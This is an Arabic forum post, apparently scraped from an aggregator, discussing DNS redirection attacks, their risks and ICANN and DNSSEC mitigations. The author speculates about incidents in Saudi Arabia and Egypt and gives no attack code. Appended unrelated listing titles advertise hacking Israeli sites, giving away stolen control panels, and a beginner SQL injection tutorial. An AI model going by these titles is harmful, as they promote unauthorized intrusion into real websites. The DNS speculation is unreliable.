(ركز هنا--Redirection-> صفحة\موقع اخر (مزيف).يعني خطورة واضحة.حيث اننا لا نعلم ما هي هذه الصفحة وما يوجد بداخلها من برمجيات
ضارة او فايروسات .او اي شي تفكر فيه حاليا..هو صحيح توقع :-
@سرقة جلسات ومعلومات مهمة.
@تحميل فايروسات الى جهازك الشخصي.
@وجود برمجيات ضارة متنوعة وتنتهك الخصوصية.
@تحويلك الى مواقع اخرى مخترقة .او صفحات مزورة مشابهة لمواقع التي طلبتها > يؤدي الى سرقة حسابات بنكية مثلا
وهذه ما واجهتها السعودية بشدة : حسب مصادرهم يذكرون انها هجمات بخسائر مالية قليلة :لكنها (؟).<الله يعينهم.
واخرها ايضا من باب هجمات DNS تعرضت لها مصر وبشدة :- حسب مصادرهم يقولون انها قطع كوابل انترنيت في البحر :لكنها(؟)
خصم الكلام لو تابعنا الاحصائيات المختلفة والمصادر والمقالات الاخرى :يتبين لنا ان عام 2009 اعام الاختراقات من العيار الثقيل:
ونصفها تمت عن طريق البنية التحتية الاساسية والي هي Domain Name System .
"نقدر نقول:-سنة صعبة مرت على الفرق الامنية المسئولة على Domain-name system"
وهارد لك يا الاخضر <انتو السبب ههههههههه ..
but seriouslly ....This is very scary / Q_x ....
there is the much from question marks about this subject......
----
هذه المشاكل كلها من سرقة حسابات بنكية الى توهيم وتضليل المستخدم الى مواقع مشبوهة .اسبابها كثيرة
لكني على الاكثر اقدر اقول سببها الاساسي هو كون المستخدم العادي غير مؤمن بدرجة كافية لكشف مثل هذه الاعمال والهجمات .
وهذا موضوع اخر نقدر ان شاء الله نتكلم عليه ونتناقش فيه في موضوع اخر ...
-------------------------------------------------------------
---------------------------------------------------------
((problem))
ان هذه الطرق اصبحت في تكاثر حيث ان اساس المشكلة تكمن في الاجهزة والبروتكولات المستخدمة في التواصل بينها للعثور على
ip address >>site or server and pc ..أقصد بالطريقة التي تتحدث بها الاجهزة في الشبكة العنكبوتية.
خبراء الحماية لنظام اسماء النطاقات ينقسمون الى قسمين حاليا<!.
نصفهم يحذر ويخوف من نتائج هذه الهجمات والتحايل الذي يصل الى مرحلة يهدد المستخدم والشبكة العنكبوتية باكملها.
والنصف الاخر لا يعيرون انتباه الى هذه المشاكل ويذكرون انها ستنتهي تدريجيا .مع تطور الحماية < اي تطور الله يهديكم ...
لكن بوجهة نظر شخصية وبخبرة بسيطة في هذا المجال الذي ادرجته على لائحتي من الاولويات.
ان المشكلة كبيرة ولن تنتهي ابدا .لكن بالامكان تقليلها وهذا على لسان مجتمع ICANN الخ:-وتم طرح الكثير من الاقتراحات:-
# توثيق الاتصالات قبل السماح بإجراء تغييرات على سجلاتNS
# منع التغير الآلي في سجل NS .
# تنفيذ حد أدنى ل "مدة الاستمرار"(TTL) لاستجابات طلب خادم الاسم.
#تحديد عناوين(IP)محدد لquery/answer لخوادم Dns .
# تحديد عدد خوادم الاسم التي يمكن تحديدها لنطاق محدد.
# تحديد عدد التغييرات في عنوان سجل (A)التي يمكن إجراؤها في إطار فاصل زمني محدد على خوادم الاسم المرتبطة بنطاق مُسجل.
# وغيرها الكثير من مراجعة (53) الى زيادة قوة التشفير وتوثيق مصادر المعلومات وعمليات الوصول ...الخ
تم العمل على بعضها .بالامكان مراجعة ICANN - Internet Corporation for Assigned Names and Numbers للمعرفة اكثر .
وتم عقد الكثير من الدراسات والتقارير حول هذه المشاكل من قبل اللجنة الاستشارية للامان والاستقرار(SSAC)الخ...
ايضا تم العمل على كثير من النقاط لحماية خوادم نظام اسماء النطاقات من هجمات dns من قبل DNS Security Extensions
مع مساعدة الكثير من الشركات الامنية بالامكان مراجعة www.dnssec.net للمعرفة اكثر .
وايضا باالامكان الاطلاع على بعض ادوات الحماية من خلال The Dnssec-Tools Project .
OpenDNS > Switch to OpenDNS Enterprise
لكن بالامكان ان نقول ما دامت الحماية في تطور بالامكان ان تتطور طرق الاختراق والتحايل الى ابعد مما وصلنا اليه حاليا
--------
-----------
Conclusion
نظام اسماء النطاقات بقواعده وخوادمه وخدماته في خطر .
وليس باستطاعتنا تجاهل هذا الشي .حيث انني يوميا اقرء اكثر واكثر وبعد التجارب الفاشلة والناجحة يتضح لي انها مشكلة كبيرة.
وان هناك بعض الطرق منها البسيطة ومنها المعقدة التي ليس من استطاعتي او استطاعة الخبراء المحترفين في هذا المجال
ان يضعوها في المجتمعات وخاصة امام Script kiddies وهذا ليس كما تسموه احتكار او عدم نشر العلم والمعرفة
بل هو خوفا من ان يسقط 50% من المحتوى العربي .نعم صدقني
--اكيد ان الخبراء في هذا المنتدى العزيز سيتفهمون كلامي وسيفسرونه كما هو مطروح وموضح.
بانتضار ارائكم ومناقشاتكم واضافاتكم فلا تبخلون علي ..اهم شي تصحيحكم حول اخطائي في هذا الموضوع .
حيث انكم ستفيدوني كثيرا وستفيدون االطامحين الاخرين لو طرحتو طرق او ناقشتو فيها او اي شي تكتبه ايديكم ...
the subject end
well see you next time. With the subject of another
----------------------------------------------------------
note
كل ما كتب هنا هو شي بسيط حول جزء صغير من الاخطار الكثيرة التي يواجهها DNS
بالامكان ايضا ان اشرح عن الطرق السابقة لكن بطريقة اخرى تختلف عن التي تم ذكرها؟؟ حيث سيختلف الشرح لو انني تعمقت اكثر
ودخلت بكل صغير وكبيرة .لكنني حاولت على قدر الامكان جعل الموضوع قصير ومفهوم .وليس معقد كما يجب ان يكون.
-"ايضا"كل الصور التي تم ارفاقها في الشرح هي مثال بسيط .للتوضيح اكثر.يعني لا تتخذها مرجع لجميع انواع هذ الهجوم او هذه المخاطر :::
-----------------------------------------------------------------------
Resources about/attack and protection DNS
http://www.dnssec.net/dns-threats /com/org
www.bind9.net
OpenDNS | Internet Navigation And Security
IANA &mdash; Internet Assigned Numbers Authority
ICANN - Internet Corporation for Assigned Names and Numbers
travel media shopping computers hardware at ccnog.org
كتاب "الاصطياد الالكتروني"
كتاب "نظام اسماء النطاقات :مخاطر وحلول"
don't forget google
also,please open the door about discussion subject
----------------------------------------------------
ارجو مسامحتي اذا كان هناك خطا في الموضوع من ناحية الشرح والتوضيح او الصور او الفديو:جهد شخصي
واسئل الله ان يكون الموضوع كامل لوجه الكريم.وان اكون افدتكم ولو بالشي القليل.والموضوع الكامل يكتمل بترابط الحلقات
وهذه الحلقات جاري العمل عليها .
تحياتي للجميع

قصف موقع إسرائيلي

الدعس على موقع إسرائيلي

قنص موقع إسرائيلي


تعلم يا مبتدأ كيفية أختراق المواقع بسهولة sql الجزء الأول

$
0
0
ثغرة SQL INJECTION من اسهل الثغرات المصاب بها الكثير من المواقع

انا عملت شرح حول الثغرة وبتمنى يعجبكم



لاتباع الاوامر ونقلها اذهب الى رابط التدوينة

http://macbook3arabi.blogspot.com/20...injection.html

موقع ا سرائلي هدية

موقع اباحي هدية حصري

هدية: لوحة تحكم موقع إسرائيلي

هدية: لوحة تحكم موقع إسرائيلي

Viewing all 6273 articles
Browse latest View live